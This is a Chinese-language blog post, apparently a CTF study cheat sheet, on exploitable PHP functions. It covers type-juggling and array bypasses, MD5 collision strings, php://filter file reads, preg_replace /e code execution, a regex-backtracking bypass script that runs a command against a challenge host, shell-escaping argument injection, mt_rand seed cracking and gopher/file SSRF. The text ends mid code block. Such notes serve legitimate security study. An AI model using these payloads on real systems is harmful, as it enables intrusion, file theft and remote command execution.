

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="alazymachine">
  <meta name="keywords" content="">
  
    <meta name="description" content="is_numeric() 1234# 将数字判断为非数字123%00，或者 123%20  其中的%20只能放在最后，否则%20后面的部分会被继续做判断# 将非数字转化为数字使用十六进制0x123456  strcmp() 12当传入的变量为数组时可以得到strcmp(password[],&#39;xxxxxx&#39;)&#x3D;&#x3D;1    addslashes()123转译单引号&#39;   ---&gt;   \&#39;\">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP漏洞函数">
<meta property="og:url" content="https://alazymechnaic.github.io/2024/03/04/php-lou-dong-han-shu/index.html">
<meta property="og:site_name" content="alazymachine">
<meta property="og:description" content="is_numeric() 1234# 将数字判断为非数字123%00，或者 123%20  其中的%20只能放在最后，否则%20后面的部分会被继续做判断# 将非数字转化为数字使用十六进制0x123456  strcmp() 12当传入的变量为数组时可以得到strcmp(password[],&#39;xxxxxx&#39;)&#x3D;&#x3D;1    addslashes()123转译单引号&#39;   ---&gt;   \&#39;\">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-03-04T06:32:51.000Z">
<meta property="article:modified_time" content="2024-03-04T06:33:13.846Z">
<meta property="article:author" content="alazymachine">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>PHP漏洞函数 - alazymachine</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"alazymechnaic.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="PHP漏洞函数"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-04 14:32" pubdate>
          2024年3月4日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          37 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">PHP漏洞函数</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="is-numeric"><a href="#is-numeric" class="headerlink" title="is_numeric()"></a>is_numeric()</h2><hr>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># 将数字判断为非数字</span><br><span class="hljs-number">123</span>%<span class="hljs-number">00</span>，或者 <span class="hljs-number">123</span>%<span class="hljs-number">20</span>  其中的%<span class="hljs-number">20</span>只能放在最后，否则%<span class="hljs-number">20</span>后面的部分会被继续做判断<br><span class="hljs-comment"># 将非数字转化为数字</span><br>使用十六进制<span class="hljs-number">0x123456</span><br></code></pre></td></tr></tbody></table></figure>

<h2 id="strcmp"><a href="#strcmp" class="headerlink" title="strcmp()"></a>strcmp()</h2><hr>
<figure class="highlight stylus"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">当传入的变量为数组时可以得到<br><span class="hljs-function"><span class="hljs-title">strcmp</span><span class="hljs-params">(password[],<span class="hljs-string">'xxxxxx'</span>)</span></span>==<span class="hljs-number">1</span><br></code></pre></td></tr></tbody></table></figure>



<h2 id="addslashes"><a href="#addslashes" class="headerlink" title="addslashes()"></a>addslashes()</h2><figure class="highlight ada"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ada">转译单引号<br>'   <span class="hljs-comment">---&gt;   \'</span><br>\   <span class="hljs-comment">---&gt;   \\</span><br></code></pre></td></tr></tbody></table></figure>



<h2 id="parse-url"><a href="#parse-url" class="headerlink" title="parse_url"></a>parse_url</h2><figure class="highlight ruby"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ruby">该函数将输入的字符串解析为协议，主机名等几部分<br>但当字符串以 /<span class="hljs-regexp">//</span> 开头时，会返回<span class="hljs-literal">false</span><br></code></pre></td></tr></tbody></table></figure>



<h2 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents()"></a>file_get_contents()</h2><hr>
<figure class="highlight awk"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">file_get_contents(<span class="hljs-variable">$text</span>,<span class="hljs-string">'r'</span>)<br><span class="hljs-comment"># 其中的$text可以传入php伪协议：data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=,从而读取到的就是传入的字符串了</span><br>file=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/read=convert.base64-encode/</span>resource=useless.php<br></code></pre></td></tr></tbody></table></figure>



<h2 id="eregi"><a href="#eregi" class="headerlink" title="eregi()"></a>eregi()</h2><hr>
<figure class="highlight arcade"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs arcade">在一个字符串搜索指定的模式的字符串。搜索不区分大小写。可选的输入参数规则包含一个数组的所有匹配表达式,他们被正则表达式的括号分组。<br>eregi (<span class="hljs-string">"/\w{8,10}/"</span>, <span class="hljs-symbol">$password</span>)  匹配成功返回<span class="hljs-literal">TRUE</span>否则返回<span class="hljs-literal">False</span><br><br>截断漏洞<br><span class="hljs-number">1.</span>%<span class="hljs-number">00</span>截断及遇到%<span class="hljs-number">00</span>则默认为字符串的结束<br><span class="hljs-number">2.</span>当传入的字符串为数组时，返回的值为<span class="hljs-literal">TRUE</span><br></code></pre></td></tr></tbody></table></figure>





<h2 id="intval"><a href="#intval" class="headerlink" title="intval"></a>intval</h2><hr>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php">Intval最大的值取决于操作系统。 <span class="hljs-number">32</span> 位系统最大带符号的 <span class="hljs-keyword">integer</span> 范围是 -<span class="hljs-number">2147483648</span> 到 <span class="hljs-number">2147483647</span>。<br><span class="hljs-comment"># 举例，在这样的系统上， intval(‘1000000000000’) 会返回 2147483647。64 位系统上，最大带符号的 integer 值是 9223372036854775807。</span><br><br>这个有个应用就是在判断数值是不是回文上，如果参数为<span class="hljs-number">2147483647</span>，那么当它反过来，由于超出了限制，所以依然等于<span class="hljs-number">2147483647</span>。即为回文。<br>    <br>    <br> 在处理数字时，若数字为科学计数法则输出前面的部分<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-string">"1e10"</span>);<br><span class="hljs-comment"># 1</span><br>但是在加上一个数字后则不同<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-string">"1e10"</span>+<span class="hljs-number">1</span>);<br><span class="hljs-comment"># 10000000001</span><br></code></pre></td></tr></tbody></table></figure>



<h2 id="array-search"><a href="#array-search" class="headerlink" title="array_search"></a>array_search</h2><hr>
<figure class="highlight abnf"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">array_search会根据键名索引键值，若使用array_search(键名，目标)<span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">=</span>false判断，当返回的键值的值为<span class="hljs-number">0</span>时，<span class="hljs-number">0</span><span class="hljs-operator">=</span><span class="hljs-operator">=</span>false为TRUE<br></code></pre></td></tr></tbody></table></figure>





<h2 id="弱类型"><a href="#弱类型" class="headerlink" title="弱类型"></a>弱类型</h2><hr>
<h3 id="“-x3D-x3D-”和“-x3D-x3D-x3D-”"><a href="#“-x3D-x3D-”和“-x3D-x3D-x3D-”" class="headerlink" title="“==”和“===”"></a><strong>“==”和“===”</strong></h3><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># “==”我们称之为等值符，当等号两边为相同类型时，直接比较值是否相等；当等号两边类型不同时，先转换为相同的类型，再对转换后的值进行比较，如果比较一个数字和字符串或者涉及到数字内容的字符串，则字符串会被转换成数值并且比较按照常数值进行比较。</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-string">"admin"</span>==<span class="hljs-number">0</span>);  <span class="hljs-comment">//true 即所有的纯字符串进行类型 转化后都变为了0</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-string">"1admin"</span>==<span class="hljs-number">1</span>); <span class="hljs-comment">//true</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-string">"admin1"</span>==<span class="hljs-number">1</span>) <span class="hljs-comment">//false</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-string">"admin1"</span>==<span class="hljs-number">0</span>) <span class="hljs-comment">//true</span><br><span class="hljs-comment">// 转化后的结果只和开头部分相关，若开头部分不是数字，则默认转化为0</span><br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-string">"0e123456"</span>==<span class="hljs-string">"0e4456789"</span>); <span class="hljs-comment">//true </span><br><span class="hljs-comment">#该字符串的开始部分决定了它的值，如果该字符串以合法的数值开始，则使用该数值，否则其值为0</span><br><br></code></pre></td></tr></tbody></table></figure>

<p>以下是值不同，但是MD5相同的字符串，可以用于弱类型比较</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">byGcY<br><span class="hljs-number">0e591948146966052067035298880982</span><br>sonZ7y<br><span class="hljs-number">0e463306343746311593316642162425</span><br><br></code></pre></td></tr></tbody></table></figure>

<p>也可以使用数组绕过a[]=123&amp;&amp;b[]=456</p>
<p>计算得到的MD5进行若比较也相等</p>
<p><strong>===</strong></p>
<figure class="highlight crmsh"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">先比较类型相等再进行比较<br><span class="hljs-keyword">op</span> === <span class="hljs-string">"2"</span><br><br>由于是===必须是类型和数值都等于'<span class="hljs-number">2</span>',所以可以让<span class="hljs-keyword">op</span>等于数字<span class="hljs-number">2</span>来绕<br></code></pre></td></tr></tbody></table></figure>

<p>a[]=123&amp;&amp;b[]=456同样可以绕过强比较</p>
<h3 id="强类型MD5绕过"><a href="#强类型MD5绕过" class="headerlink" title="强类型MD5绕过"></a>强类型MD5绕过</h3><figure class="highlight llvm"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs llvm">a<span class="hljs-operator">=</span><span class="hljs-variable">%4</span>d<span class="hljs-variable">%c9</span><span class="hljs-variable">%68</span><span class="hljs-variable">%ff</span><span class="hljs-variable">%0</span>e<span class="hljs-variable">%e3</span><span class="hljs-variable">%5</span><span class="hljs-keyword">c</span><span class="hljs-variable">%20</span><span class="hljs-variable">%95</span><span class="hljs-variable">%72</span><span class="hljs-variable">%d4</span><span class="hljs-variable">%77</span><span class="hljs-variable">%7</span>b<span class="hljs-variable">%72</span><span class="hljs-variable">%15</span><span class="hljs-variable">%87</span><span class="hljs-variable">%d3</span><span class="hljs-variable">%6</span>f<span class="hljs-variable">%a7</span><span class="hljs-variable">%b2</span><span class="hljs-variable">%1</span>b<span class="hljs-variable">%dc</span><span class="hljs-variable">%56</span><span class="hljs-variable">%b7</span><span class="hljs-variable">%4</span>a<span class="hljs-variable">%3</span>d<span class="hljs-variable">%c0</span><span class="hljs-variable">%78</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%7</span>b<span class="hljs-variable">%95</span><span class="hljs-variable">%18</span><span class="hljs-variable">%af</span><span class="hljs-variable">%bf</span><span class="hljs-variable">%a2</span><span class="hljs-variable">%00</span><span class="hljs-variable">%a8</span><span class="hljs-variable">%28</span><span class="hljs-variable">%4</span>b<span class="hljs-variable">%f3</span><span class="hljs-variable">%6</span>e<span class="hljs-variable">%8</span>e<span class="hljs-variable">%4</span>b<span class="hljs-variable">%55</span><span class="hljs-variable">%b3</span><span class="hljs-variable">%5</span>f<span class="hljs-variable">%42</span><span class="hljs-variable">%75</span><span class="hljs-variable">%93</span><span class="hljs-variable">%d8</span><span class="hljs-variable">%49</span><span class="hljs-variable">%67</span><span class="hljs-variable">%6</span>d<span class="hljs-variable">%a0</span><span class="hljs-variable">%d1</span><span class="hljs-variable">%55</span><span class="hljs-variable">%5</span>d<span class="hljs-variable">%83</span><span class="hljs-variable">%60</span><span class="hljs-variable">%fb</span><span class="hljs-variable">%5</span>f<span class="hljs-variable">%07</span><span class="hljs-variable">%fe</span><span class="hljs-variable">%a2</span><br>b<span class="hljs-operator">=</span><span class="hljs-variable">%4</span>d<span class="hljs-variable">%c9</span><span class="hljs-variable">%68</span><span class="hljs-variable">%ff</span><span class="hljs-variable">%0</span>e<span class="hljs-variable">%e3</span><span class="hljs-variable">%5</span><span class="hljs-keyword">c</span><span class="hljs-variable">%20</span><span class="hljs-variable">%95</span><span class="hljs-variable">%72</span><span class="hljs-variable">%d4</span><span class="hljs-variable">%77</span><span class="hljs-variable">%7</span>b<span class="hljs-variable">%72</span><span class="hljs-variable">%15</span><span class="hljs-variable">%87</span><span class="hljs-variable">%d3</span><span class="hljs-variable">%6</span>f<span class="hljs-variable">%a7</span><span class="hljs-variable">%b2</span><span class="hljs-variable">%1</span>b<span class="hljs-variable">%dc</span><span class="hljs-variable">%56</span><span class="hljs-variable">%b7</span><span class="hljs-variable">%4</span>a<span class="hljs-variable">%3</span>d<span class="hljs-variable">%c0</span><span class="hljs-variable">%78</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%7</span>b<span class="hljs-variable">%95</span><span class="hljs-variable">%18</span><span class="hljs-variable">%af</span><span class="hljs-variable">%bf</span><span class="hljs-variable">%a2</span><span class="hljs-variable">%02</span><span class="hljs-variable">%a8</span><span class="hljs-variable">%28</span><span class="hljs-variable">%4</span>b<span class="hljs-variable">%f3</span><span class="hljs-variable">%6</span>e<span class="hljs-variable">%8</span>e<span class="hljs-variable">%4</span>b<span class="hljs-variable">%55</span><span class="hljs-variable">%b3</span><span class="hljs-variable">%5</span>f<span class="hljs-variable">%42</span><span class="hljs-variable">%75</span><span class="hljs-variable">%93</span><span class="hljs-variable">%d8</span><span class="hljs-variable">%49</span><span class="hljs-variable">%67</span><span class="hljs-variable">%6</span>d<span class="hljs-variable">%a0</span><span class="hljs-variable">%d1</span><span class="hljs-variable">%d5</span><span class="hljs-variable">%5</span>d<span class="hljs-variable">%83</span><span class="hljs-variable">%60</span><span class="hljs-variable">%fb</span><span class="hljs-variable">%5</span>f<span class="hljs-variable">%07</span><span class="hljs-variable">%fe</span><span class="hljs-variable">%a2</span><br><br>二者的MD<span class="hljs-number">5</span>值是相同的<br><br></code></pre></td></tr></tbody></table></figure>





<h2 id="preg-replace"><a href="#preg-replace" class="headerlink" title="preg_replace"></a>preg_replace</h2><hr>
<figure class="highlight"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">使用数组传入，则正则表达式一定无法匹配到<br></code></pre></td></tr></tbody></table></figure>

<p><strong>/e漏洞</strong></p>
<figure class="highlight awk"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">preg_replace(<span class="hljs-string">'/('</span>. <span class="hljs-variable">$regex</span>.<span class="hljs-string">')/ei'</span>,<span class="hljs-string">'strtolower("\1")'</span>,<span class="hljs-variable">$value</span>); <span class="hljs-comment"># 该函数的作用是将在第三个参数中根据第一个参数进行匹配，将匹配到的字符串使用第二个字符串进行替换、</span><br>启用\e模式后，则第二个参数会当做命令进行执行<br>https:<span class="hljs-regexp">//</span>xz.aliyun.com<span class="hljs-regexp">/t/</span><span class="hljs-number">2557</span><br>\S*=<span class="hljs-variable">${getflag()}</span> 即可使getflag()被执行<br></code></pre></td></tr></tbody></table></figure>

<h3 id="单行匹配"><a href="#单行匹配" class="headerlink" title="单行匹配"></a>单行匹配</h3><p>如果传入的字符串中含有换行符，则会只匹配第一行看，可以使用%0A进行绕过</p>
<h3 id="超长字符串绕过"><a href="#超长字符串绕过" class="headerlink" title="超长字符串绕过"></a>超长字符串绕过</h3><p>当输入的内容过长时 ，PHP为了防止出现DDOS攻击会限制正则表达式的回溯次数（默认回溯次数上限是一百万）</p>
<p>因此可以在Payload后添加超长的字符串，导致匹配结果为false从而绕过</p>
<p>例题：[FBCTF2019]RCEService</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br>payload = <span class="hljs-string">'{"cmd":"/bin/cat /home/rceservice/flag","test":"'</span> + <span class="hljs-string">"a"</span>*(<span class="hljs-number">1000000</span>) + <span class="hljs-string">'"}'</span><br>res = requests.post(<span class="hljs-string">"http://434b3585-3396-4c38-8cd8-1a8425f7886a.node3.buuoj.cn/"</span>, data={<span class="hljs-string">"cmd"</span>:payload})<br><span class="hljs-built_in">print</span>(res.text)<br></code></pre></td></tr></tbody></table></figure>



<h2 id="escapeshellarg-escapeshellcmd"><a href="#escapeshellarg-escapeshellcmd" class="headerlink" title="escapeshellarg()+escapeshellcmd()"></a>escapeshellarg()+escapeshellcmd()</h2><hr>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">传入的参数是：172.17.0.2' -v -d a=1<br>经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1'，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。# 将单引号包裹成 '\''<br>经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\'，这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义：http://php.net/manual/zh/function.escapeshellcmd.php	<br>最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\'，由于中间的\\被解释为\而不再是转义字符，所以后面的'没有被转义，与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1'，即向172.17.0.2\发起请求，POST 数据为a1'。<br><br>escapeshellcmd # 单纯的加上反斜杠转译<br></code></pre></td></tr></tbody></table></figure>

<p>由于用户输入往往会被系统使用单引号括起来，则在payload中加入单引号，由于两个函数的连用，导致本来应该被转译的单引号出现逃逸</p>
<p><a target="_blank" rel="noopener" href="https://paper.seebug.org/164/">https://paper.seebug.org/164/</a></p>
<h2 id="rand"><a href="#rand" class="headerlink" title="rand()"></a>rand()</h2><hr>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># mt_scrand(seed)这个函数的意思，是通过分发seed种子，然后种子有了后，靠mt_rand()生成随机数。</span><br><span class="hljs-comment"># 使用工具php_mt_seed-4.0</span><br><br><br>使用脚本<br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$pass_now</span> = <span class="hljs-string">"FpCyLNvPOj"</span>;<br><span class="hljs-variable">$allowable_characters</span> = <span class="hljs-string">'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span>;<br><br><span class="hljs-variable">$length</span> = <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$allowable_characters</span>) - <span class="hljs-number">1</span>;<br><br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$j</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$j</span> &lt; <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$pass_now</span>); <span class="hljs-variable">$j</span>++) {<br>    <span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; <span class="hljs-variable">$length</span>; <span class="hljs-variable">$i</span>++) {<br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable">$pass_now</span>[<span class="hljs-variable">$j</span>] == <span class="hljs-variable">$allowable_characters</span>[<span class="hljs-variable">$i</span>]) {<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">"<span class="hljs-subst">$i</span> <span class="hljs-subst">$i</span> 0 <span class="hljs-subst">$length</span> "</span>;<br>            <span class="hljs-keyword">break</span>;<br>        }<br>    }<br>}<br><span class="hljs-meta">?&gt;</span><br><br><span class="hljs-comment"># ./php_mt_seed-4.0 41 41 0 61 15 15 0 61 38 38 0 61 24 24 0 61 47 47 0 61 49 49 0 61 21 21 0 61 51 51 0 61 50 50 0 61 9 9 0 61</span><br><span class="hljs-comment"># 即可跑出对应的种子</span><br><br><br>	<br></code></pre></td></tr></tbody></table></figure>



<h2 id="curl-exec"><a href="#curl-exec" class="headerlink" title="curl_exec"></a>curl_exec</h2><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">##漏洞代码如下</span><br>			<span class="hljs-variable">$ch</span>=<span class="hljs-title function_ invoke__">curl_init</span>(<span class="hljs-variable">$url</span>);<br>            <span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$ch</span>, CURLOPT_HEADER, <span class="hljs-number">0</span>);<br>            <span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="hljs-number">1</span>);<br>            <span class="hljs-variable">$result</span>=<span class="hljs-title function_ invoke__">curl_exec</span>(<span class="hljs-variable">$ch</span>);<br>            <span class="hljs-title function_ invoke__">curl_close</span>(<span class="hljs-variable">$ch</span>);<br>            <span class="hljs-keyword">echo</span> (<span class="hljs-variable">$result</span>);<br><br><span class="hljs-comment">## 利用方式</span><br>传入的url可以使用file协议进行文件的读取<br>传入gopher协议可以进行ssrf，将请求的get或者post数据包进行url编码进行传递<br><br>url=gopher:<span class="hljs-comment">//127.0.0.1:80/_[Payload]</span><br>Payload 中的%<span class="hljs-number">0</span>a要使用%<span class="hljs-number">0</span>d%<span class="hljs-number">0</span>a进行传递    